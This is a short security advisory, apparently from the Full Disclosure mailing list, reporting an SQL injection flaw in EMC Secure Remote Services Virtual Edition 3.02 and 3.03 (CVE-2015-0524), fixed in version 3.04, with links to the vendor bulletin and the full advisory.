EMC Secure Remote Services Virtual Edition Provisioning component is affected by SQL injection Han Sahin, November 2014 Abstract An SQL injection vulnerability was found in EMC Secure Remote Services Virtual Edition (ESRS VE) that allows an attacker to retrieve arbitrary data from the application, interfere with its logic, or execute commands on the database server itself. Affected versions EMC reports that the following versions are affected by this vulnerability: - EMC Secure Remote Services Virtual Edition 3.02 - EMC Secure Remote Services Virtual Edition 3.03 See also - CVE-2015-0524 - ESA-2015-040: EMC Secure Remote Services Virtual Edition Security Update for Multiple Vulnerabilities Fix EMC released EMC Secure Remote Services Virtual Edition 3.04 that resolves this vulnerability. Registered EMC Online Support customers can download patches and software from support.emc.com at: EMC Secure Remote Services - EMC Secure Remote Services Virtual Edition - Downloads Details https://www.securify.nl/advisory/SFY20141113/emc_secure_remote_services_virtual_edition_provisioning_component_is_affected_by_sql_injection.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
